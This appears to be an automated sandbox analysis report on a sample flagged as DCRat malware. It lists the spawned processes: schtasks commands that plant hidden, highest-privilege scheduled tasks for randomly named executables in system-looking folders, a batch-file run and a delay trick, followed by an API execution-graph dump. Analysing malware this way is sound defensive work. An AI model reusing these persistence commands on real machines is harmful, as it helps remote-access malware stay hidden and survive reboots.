                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP"
                                                                                                                                Imagebase:0x7ff759480000
                                                                                                                                File size:52'744 bytes
                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:13
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:14
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:18
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:19
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0x340000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:21
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0xa0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:22
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:23
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:25
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 13 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:27
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:28
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:29
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:30
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 8 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:31
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "bridgeportDhcpcommon" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:32
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:33
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat"
                                                                                                                                Imagebase:0x7ff651440000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:34
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:35
                                                                                                                                Start time:15:47:20
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:chcp 65001
                                                                                                                                Imagebase:0x7ff667160000
                                                                                                                                File size:14'848 bytes
                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:36
                                                                                                                                Start time:15:47:20
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                Imagebase:0x7ff7d83c0000
                                                                                                                                File size:108'032 bytes
                                                                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:37
                                                                                                                                Start time:15:47:21
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Imagebase:0x250000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:38
                                                                                                                                Start time:15:47:21
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Imagebase:0xeb0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:39
                                                                                                                                Start time:15:47:25
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0x6e0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:42
                                                                                                                                Start time:15:47:35
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0xc70000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:43
                                                                                                                                Start time:15:47:43
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                                                                                                                Imagebase:0x90000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:45
                                                                                                                                Start time:15:48:00
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0xea0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:9.5%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:9.4%
                                                                                                                                  Total number of Nodes:1495
                                                                                                                                  Total number of Limit Nodes:45
                                                                                                                                  execution_graph 25340 8bc793 97 API calls 4 library calls 25378 8bb18d 78 API calls 25379 8b9580 6 API calls 25403 8bc793 102 API calls 4 library calls 25342 8cb49d 6 API calls _ValidateLocalCookies 25419 8a6faa 111 API calls 3 library calls 25344 8bdca1 DialogBoxParamW 25420 8bf3a0 27 API calls 25347 8ca4a0 71 API calls _free 25381 8beda7 48 API calls _unexpected 25404 8ca6a0 31 API calls 2 library calls 25348 8d08a0 IsProcessorFeaturePresent 25421 8b1bbd GetCPInfo IsDBCSLeadByte 23449 8bf3b2 23450 8bf3be __FrameHandler3::FrameUnwindToState 23449->23450 23481 8beed7 23450->23481 23452 8bf3c5 23453 8bf518 23452->23453 23456 8bf3ef 23452->23456 23554 8bf838 4 API calls 2 library calls 23453->23554 23455 8bf51f 23547 8c7f58 23455->23547 23467 8bf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23456->23467 23492 8c8aed 23456->23492 23463 8bf40e 23466 8bf495 23501 8c8a3e 51 API calls 23466->23501 23471 8bf48f 23467->23471 23550 8c7af4 38 API calls _abort 23467->23550 23470 8bf49d 23502 8bdf1e 23470->23502 23500 8bf953 GetStartupInfoW __cftof 23471->23500 23475 8bf4b1 23475->23455 23476 8bf4b5 23475->23476 23477 8bf4be 23476->23477 23552 8c7efb 28 API calls _abort 23476->23552 23553 8bf048 12 API calls ___scrt_uninitialize_crt 23477->23553 23480 8bf4c6 23480->23463 23482 8beee0 23481->23482 23556 8bf654 IsProcessorFeaturePresent 23482->23556 23484 8beeec 23557 8c2a5e 23484->23557 23486 8beef1 23491 8beef5 23486->23491 23565 8c8977 23486->23565 23489 8bef0c 23489->23452 23491->23452 23495 8c8b04 23492->23495 23493 8bfbbc _ValidateLocalCookies 5 API calls 23494 8bf408 23493->23494 23494->23463 23496 8c8a91 23494->23496 23495->23493 23498 8c8ac0 23496->23498 23497 8bfbbc _ValidateLocalCookies 5 API calls 23499 8c8ae9 23497->23499 23498->23497 23499->23467 23500->23466 23501->23470 23624 8b0863 23502->23624 23506 8bdf3d 23673 8bac16 23506->23673 23508 8bdf46 __cftof 23509 8bdf59 GetCommandLineW 23508->23509 23510 8bdf68 23509->23510 23511 8bdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23509->23511 23677 8bc5c4 23510->23677 23688 8a4092 23511->23688 23517 8bdfe0 23682 8bdbde 23517->23682 23518 8bdf76 OpenFileMappingW 23521 8bdf8f MapViewOfFile 23518->23521 23522 8bdfd6 CloseHandle 23518->23522 23523 8bdfcd UnmapViewOfFile 23521->23523 23524 8bdfa0 __InternalCxxFrameHandler 23521->23524 23522->23511 23523->23522 23529 8bdbde 2 API calls 23524->23529 23531 8bdfbc 23529->23531 23530 8b90b7 8 API calls 23532 8be0aa DialogBoxParamW 23530->23532 23531->23523 23533 8be0e4 23532->23533 23534 8be0fd 23533->23534 23535 8be0f6 Sleep 23533->23535 23538 8be10b 23534->23538 23721 8bae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23534->23721 23535->23534 23537 8be12a DeleteObject 23539 8be13f DeleteObject 23537->23539 23540 8be146 23537->23540 23538->23537 23539->23540 23541 8be177 23540->23541 23545 8be189 23540->23545 23722 8bdc3b 6 API calls 23541->23722 23544 8be17d CloseHandle 23544->23545 23718 8bac7c 23545->23718 23546 8be1c3 23551 8bf993 GetModuleHandleW 23546->23551 24016 8c7cd5 23547->24016 23550->23471 23551->23475 23552->23477 23553->23480 23554->23455 23556->23484 23569 8c3b07 23557->23569 23560 8c2a67 23560->23486 23562 8c2a6f 23563 8c2a7a 23562->23563 23583 8c3b43 DeleteCriticalSection 23562->23583 23563->23486 23612 8cc05a 23565->23612 23568 8c2a7d 7 API calls 2 library calls 23568->23491 23570 8c3b10 23569->23570 23572 8c3b39 23570->23572 23573 8c2a63 23570->23573 23584 8c3d46 23570->23584 23589 8c3b43 DeleteCriticalSection 23572->23589 23573->23560 23575 8c2b8c 23573->23575 23605 8c3c57 23575->23605 23578 8c2ba1 23578->23562 23580 8c2baf 23581 8c2bbc 23580->23581 23611 8c2bbf 6 API calls ___vcrt_FlsFree 23580->23611 23581->23562 23583->23560 23590 8c3c0d 23584->23590 23587 8c3d7e InitializeCriticalSectionAndSpinCount 23588 8c3d69 23587->23588 23588->23570 23589->23573 23591 8c3c26 23590->23591 23592 8c3c4f 23590->23592 23591->23592 23597 8c3b72 23591->23597 23592->23587 23592->23588 23595 8c3c3b GetProcAddress 23595->23592 23596 8c3c49 23595->23596 23596->23592 23603 8c3b7e ___vcrt_InitializeCriticalSectionEx 23597->23603 23598 8c3bf3 23598->23592 23598->23595 23599 8c3b95 LoadLibraryExW 23600 8c3bfa 23599->23600 23601 8c3bb3 GetLastError 23599->23601 23600->23598 23602 8c3c02 FreeLibrary 23600->23602 23601->23603 23602->23598 23603->23598 23603->23599 23604 8c3bd5 LoadLibraryExW 23603->23604 23604->23600 23604->23603 23606 8c3c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23605->23606 23607 8c3c71 23606->23607 23608 8c3c8a TlsAlloc 23607->23608 23609 8c2b96 23607->23609 23609->23578 23610 8c3d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23609->23610 23610->23580 23611->23578 23615 8cc073 23612->23615 23614 8beefe 23614->23489 23614->23568 23616 8bfbbc 23615->23616 23617 8bfbc5 IsProcessorFeaturePresent 23616->23617 23618 8bfbc4 23616->23618 23620 8bfc07 23617->23620 23618->23614 23623 8bfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23620->23623 23622 8bfcea 23622->23614 23623->23622 23723 8bec50 23624->23723 23627 8b0888 GetProcAddress 23630 8b08b9 GetProcAddress 23627->23630 23631 8b08a1 23627->23631 23628 8b08e7 23629 8b0c14 GetModuleFileNameW 23628->23629 23734 8c75fb 42 API calls 2 library calls 23628->23734 23644 8b0c32 23629->23644 23633 8b08cb 23630->23633 23631->23630 23633->23628 23634 8b0b54 23634->23629 23635 8b0b5f GetModuleFileNameW CreateFileW 23634->23635 23636 8b0c08 CloseHandle 23635->23636 23637 8b0b8f SetFilePointer 23635->23637 23636->23629 23637->23636 23638 8b0b9d ReadFile 23637->23638 23638->23636 23642 8b0bbb 23638->23642 23641 8b0c94 GetFileAttributesW 23643 8b0cac 23641->23643 23641->23644 23642->23636 23645 8b081b 2 API calls 23642->23645 23647 8b0cb7 23643->23647 23650 8b0cec 23643->23650 23644->23641 23644->23643 23646 8b0c5d CompareStringW 23644->23646 23725 8ab146 23644->23725 23728 8b081b 23644->23728 23645->23642 23646->23644 23649 8b0cd0 GetFileAttributesW 23647->23649 23652 8b0ce8 23647->23652 23648 8b0dfb 23672 8ba64d GetCurrentDirectoryW 23648->23672 23649->23647 23649->23652 23650->23648 23651 8ab146 GetVersionExW 23650->23651 23653 8b0d06 23651->23653 23652->23650 23654 8b0d0d 23653->23654 23655 8b0d73 23653->23655 23657 8b081b 2 API calls 23654->23657 23656 8a4092 _swprintf 51 API calls 23655->23656 23658 8b0d9b AllocConsole 23656->23658 23659 8b0d17 23657->23659 23660 8b0da8 GetCurrentProcessId AttachConsole 23658->23660 23661 8b0df3 ExitProcess 23658->23661 23662 8b081b 2 API calls 23659->23662 23739 8c3e13 23660->23739 23664 8b0d21 23662->23664 23735 8ae617 23664->23735 23665 8b0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23665->23661 23668 8a4092 _swprintf 51 API calls 23669 8b0d4f 23668->23669 23670 8ae617 53 API calls 23669->23670 23671 8b0d5e 23670->23671 23671->23661 23672->23506 23674 8b081b 2 API calls 23673->23674 23675 8bac2a OleInitialize 23674->23675 23676 8bac4d GdiplusStartup SHGetMalloc 23675->23676 23676->23508 23679 8bc5ce 23677->23679 23678 8bc6e4 23678->23517 23678->23518 23679->23678 23680 8b1fac CharUpperW 23679->23680 23764 8af3fa 82 API calls 2 library calls 23679->23764 23680->23679 23683 8bec50 23682->23683 23684 8bdbeb SetEnvironmentVariableW 23683->23684 23686 8bdc0e 23684->23686 23685 8bdc36 23685->23511 23686->23685 23687 8bdc2a 